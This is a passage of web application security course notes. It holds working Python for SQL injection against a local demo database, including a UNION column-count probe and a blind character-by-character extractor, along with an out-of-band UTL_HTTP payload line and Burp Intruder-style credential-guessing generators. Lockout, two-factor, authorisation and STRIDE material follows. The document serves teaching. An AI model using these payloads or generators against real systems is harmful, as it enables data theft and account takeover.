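        payload = "x' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            lookup_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return 0


def page_differs(conn, acno: str) -> bool:
    """Boolean oracle: the attacker only sees whether the page shows a row."""
    return len(lookup_vulnerable(conn, acno)) > 0


def blind_extract(conn, column: str, where_acno: str, max_len: int = 32):
    """Recover one string value character by character through the oracle.
    Each character is found by binary search over its code point (0..127),
    so 7 requests per character instead of one per candidate character."""
    subq = f"(SELECT {column} FROM banktable WHERE acno='{where_acno}')"
    result, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{where_acno}' AND unicode(substr({subq},{pos},1))>{mid}--"
            requests += 1
            if page_differs(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:      # substr() past the end gives '', unicode('') is NULL,
            break        # so the comparison is never true: end of string
        result += chr(lo)
    return result, requests


if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, UNION_PAYLOAD))   # salary rows leak
    print(lookup_safe(db, UNION_PAYLOAD))         # [] : payload treated as a value
    print(count_columns(db), blind_extract(db, "holder", "1"))
```

The blind loop is what sqlmap automates: with a yes/no oracle and about seven requests per character, the holder name comes back in under sixty requests, which is why "no data is returned" does not mean "no data is lost".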

Out-of-band SQLi

Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.

Out-of-band SQLi techniques rely on the database server's ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server's xp_dirtree command, which can be used to make DNS requests to a server an attacker controls, as well as Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.

1 or UTL_HTTP.request('http://google.com')

First-order attack: The attacker simply enters a malicious string and causes the modified code to be executed immediately.

Second-order attack: The attacker injects into persistent storage (such as a table row or cookie) which is deemed a trusted source. The attack is subsequently executed by another activity that reads that stored data into a query.

Lateral injection (Oracle): The attacker can manipulate the implicit function To_Char() by changing the values of the environment variables NLS_Date_Format or NLS_Numeric_Characters, so a date or number that was never "user input" yields a quote character when converted.

[^a-zA-Z0-9] -- allow-list pattern: anything that is not a letter or digit is rejected

0x22 ---> " (double quote)

To_Char(0x22) ---> "

0x22:10:50

NLS_Date_Format(":10:50)
sqlmap

Burp Intruder attack types

Sniper ---> one payload set, one position at a time (the other positions keep their original value)

Battering Ram ---> one payload set, the same payload placed in all positions at once

Pitchfork ---> one payload set per position, walked in lock-step (first payload of each set together, then the second ...); stops at the shortest set

Cluster Bomb ---> one payload set per position, all combinations (Cartesian product) of the sets
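The four attack types as payload generators, added here as an example (not from the course notes and not Burp's own code). Positions are marked with § as in Intruder, the text between a pair of markers is the original value of that position, and the template is the login body from the notes with two positions.

```python
# Added example (not from the course notes): Burp Intruder's four attack
# types as generators. § marks a position; the text inside a §...§ pair is
# the position's original value, kept where an attack does not touch it.
from itertools import product

MARK = "\u00a7"  # §


def split_template(template: str):
    """Return (literals, defaults): the literal text around each position and
    the original value inside each §...§ pair."""
    parts = template.split(MARK)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced § markers")
    return parts[0::2], parts[1::2]


def render(literals, values) -> str:
    out = literals[0]
    for value, literal in zip(values, literals[1:]):
        out += value + literal
    return out


def sniper(template: str, payloads):
    """One payload at a time into one position; the other positions keep
    their original values. Requests: positions x payloads."""
    literals, defaults = split_template(template)
    for i in range(len(defaults)):
        for p in payloads:
            values = list(defaults)
            values[i] = p
            yield render(literals, values)


def battering_ram(template: str, payloads):
    """The same payload in every position at once. Requests: payloads."""
    literals, defaults = split_template(template)
    for p in payloads:
        yield render(literals, [p] * len(defaults))


def pitchfork(template: str, payload_sets):
    """One payload set per position, walked in lock-step (1st with 1st, 2nd
    with 2nd ...). Requests: length of the shortest set."""
    literals, defaults = split_template(template)
    if len(payload_sets) != len(defaults):
        raise ValueError("pitchfork needs exactly one payload set per position")
    for combo in zip(*payload_sets):
        yield render(literals, list(combo))


def cluster_bomb(template: str, payload_sets):
    """Every combination of the sets (Cartesian product). Requests: product
    of the set sizes, so it grows fast."""
    literals, defaults = split_template(template)
    if len(payload_sets) != len(defaults):
        raise ValueError("cluster bomb needs exactly one payload set per position")
    for combo in product(*payload_sets):
        yield render(literals, list(combo))


# Constructed example: the login body from the notes with two positions.
TEMPLATE = "uname=§krishna§&pwd=§happy123%24§&login=Login"

if __name__ == "__main__":
    users, pwds = ["admin", "jsmith"], ["Demo1234", "happy123%24", "test"]
    for name, gen in (("sniper", sniper(TEMPLATE, pwds)),
                      ("battering ram", battering_ram(TEMPLATE, pwds)),
                      ("pitchfork", pitchfork(TEMPLATE, [users, pwds])),
                      ("cluster bomb", cluster_bomb(TEMPLATE, [users, pwds]))):
        print(name, list(gen))
```

Pitchfork is the one to use when you already hold matching pairs (a leaked username:password list); cluster bomb is for trying every password against every username, and its request count is the product of the list sizes, which is what lockout and CAPTCHA defences are meant to make expensive.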

https://github.com/zaproxy/zaproxy/wiki/Downloads

Java and .NET

CSPRNG (cryptographically secure pseudo-random number generator)

AuthN

Recognise the user/person/process

Login form ---> forms-based authentication

Brute force -- countermeasures

-- CAPTCHA

-- Lock the user after 3/10 failures -- 24

--- 3 wrong passwords -- 10 mins

--- 4 wrong passwords --- 20 mins

---- CAPTCHA + lock
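The escalating lockout from the list above (3 failures, 10 minutes; 4 failures, 20 minutes) as a small server-side throttle, added here as an example and not from the course notes. The duration after the fifth failure is assumed, and the clock is injectable so the behaviour can be tested without waiting.

```python
# Added example (not from the course notes): escalating account lockout.
# Consecutive failures raise the lock duration; a success resets the count.
import time

# failure count -> lock duration in seconds; counts beyond the table reuse
# the last entry (the 24 h value after the 5th failure is assumed)
LOCK_SCHEDULE = {3: 10 * 60, 4: 20 * 60, 5: 24 * 60 * 60}


class LoginThrottle:
    def __init__(self, clock=time.monotonic, schedule=LOCK_SCHEDULE):
        self.clock = clock
        self.schedule = schedule
        self.failures = {}      # user -> consecutive failed attempts
        self.locked_until = {}  # user -> clock time at which the lock expires

    def seconds_locked(self, user: str) -> float:
        return max(0.0, self.locked_until.get(user, 0.0) - self.clock())

    def attempt(self, user: str, password_ok: bool) -> str:
        """Record one login attempt and return 'locked', 'ok' or 'wrong'.
        The password is NOT evaluated while the account is locked, so a guess
        made during the lock window tells the attacker nothing."""
        if self.seconds_locked(user) > 0:
            return "locked"
        if password_ok:
            self.failures.pop(user, None)
            self.locked_until.pop(user, None)
            return "ok"
        n = self.failures.get(user, 0) + 1
        self.failures[user] = n
        if n >= min(self.schedule):
            duration = self.schedule.get(n, self.schedule[max(self.schedule)])
            self.locked_until[user] = self.clock() + duration
        return "wrong"


if __name__ == "__main__":
    throttle = LoginThrottle()
    for i in range(5):
        print(i + 1, throttle.attempt("krishna", False), throttle.seconds_locked("krishna"))
```

The counter is per user, so this stops a dictionary attack on one account but not password spraying (one common password tried once against many accounts); that is why the notes pair the lock with a CAPTCHA and why a per-source-IP limit is usually added as well.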

---- Keyloggers

Virtual keyboards

Two-factor authentication

Forms login + OTP over phone --- 2-factor (something you know + something you have)

Forms login + OTP over email --- 2-factor

Forms login + security questions --- not 2-factor (both are something you know)

AuthZ

Allowed or not (is this authenticated user permitted to do this action on this object?)

Introduction to authorization
Horizontal privilege escalation (acting as another user at the same level)
Vertical privilege escalation (acting as a higher-privileged role, e.g. admin)
IDOR (insecure direct object reference: changing an ID in the request to reach someone else's record)
SDLC

Requirement Gathering ----> Design ----> Coding ----> Testing ----> Deployment ----> Maintenance

S-SDLC

Requirement gathering --- BA --- users --- functional requirements + security requirements

Design --- tech architect --- php/mysql/apache --- threat modelling

Coding ---- develop the application --- SAST

Testing ---- check whether the requirements are met --- DAST

Deploy and maintain --- PT (penetration testing)

Threat Modelling

STRIDE

S -- Spoofing --- countered by AuthN
     Forms-based, multi-factor, NTLM, certificates, AuthN services

T -- Tampering --- integrity: digital signatures / MACs (encryption alone hides data but does not detect modification)

R -- Repudiation --- AuthN plus logging, so every action can be attributed to a user

I -- Information Disclosure --- confidentiality: encryption, access control

D -- Denial of Service --- availability

E -- Elevation of Privilege --- AuthZ

Risk = Likelihood x Impact
